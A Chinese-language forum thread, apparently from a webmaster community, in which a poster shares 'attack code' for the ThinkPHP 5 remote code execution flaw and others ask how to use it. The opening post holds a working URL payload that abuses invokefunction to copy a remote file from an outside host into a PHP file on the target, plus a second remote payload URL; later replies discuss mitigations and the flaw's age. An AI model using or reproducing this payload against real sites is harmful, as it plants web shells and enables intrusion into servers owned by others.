共计 881 个字符,预计需要花费 3 分钟才能阅读完成。
来来,什么宝塔问题,给你们一段攻击代码,大家悠着玩
/?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://tongyong888.xyz/cmd.txt&vars%5B1%5D%5B%5D=roeter.php 复制代码
请注意,注入信息,和今天说的 js 是否基本一致
http://tongyong888.xyz/dama.txt 复制代码
上一篇:不要停下来啊
下一篇:急急急!找 BT 中招站长!
tp5 rce 应该跟宝塔这漏洞不沾边,拿到的只是 www 权限,部分人宝塔的 nginx 执行文件都被替换成了后门版
SuperMaster 发表于 2022-12-9 03:38
Thinkphp5 远程代码执行
Thinkphp5 新出一个高危漏洞怎么用?给个教程啊
noamwtcv 发表于 2022-12-9 03:36
怎么用?
你猜!
noamwtcv 发表于 2022-12-9 03:36
怎么用?
Thinkphp5 远程代码执行
noamwtcv 发表于 2022-12-9 03:36
怎么用?给个教程啊
话说你的电影站很吊啊。
是本地资源吗?还是通过什么口子上传的。
lovees 发表于 2022-12-9 03:41
Thinkphp5 新出一个高危漏洞
别神神秘秘的,既然发了就说明白点给 MJJ 听。
SuperMaster 发表于 2022-12-9 03:42
别神神秘秘的,既然发了就说明白点给 MJJ 听。
基本都是 python 写的 RCE 注入不想玩。。。开着防跨站攻击,PHP 禁用函数,就算 thinkphp 有漏洞也无法更改文件啊 maccms 就是 thinkphp5 又有人要遭殃了这都多老的 0day 了。而且人家也没装 TP5 这三年前的吧
lovees 发表于 2022-12-9 03:41
Thinkphp5 新出一个高危漏洞
这是新的吗,听说被修复了啊,还能用吗
noamwtcv 发表于 2022-12-9 03:36
怎么用?给个教程啊
你这影视站是什么模板啊?控制器不存在:thinkapp